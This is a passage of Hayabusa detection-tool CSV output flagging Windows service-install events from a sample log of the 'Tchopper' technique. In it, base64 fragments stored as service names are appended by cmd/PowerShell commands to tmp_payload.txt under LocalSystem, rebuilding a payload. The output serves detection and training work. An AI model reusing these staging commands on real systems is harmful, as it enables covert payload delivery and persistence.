RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:59.742 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:59.742 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:01.196 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:01.196 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:01.196 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:02.650 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:02.650 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:02.650 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:04.105 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:04.105 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:04.105 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:05.542 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:05.542 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:05.542 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:06.982 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:06.982 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:06.982 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:08.440 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:08.440 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:08.440 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:09.909 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:09.909 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:09.909 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:11.349 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:11.349 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:11.349 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:12.786 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:12.786 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:12.786 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:14.233 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:14.233 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:14.233 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:15.677 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:15.677 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:15.677 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:17.117 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:17.117 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 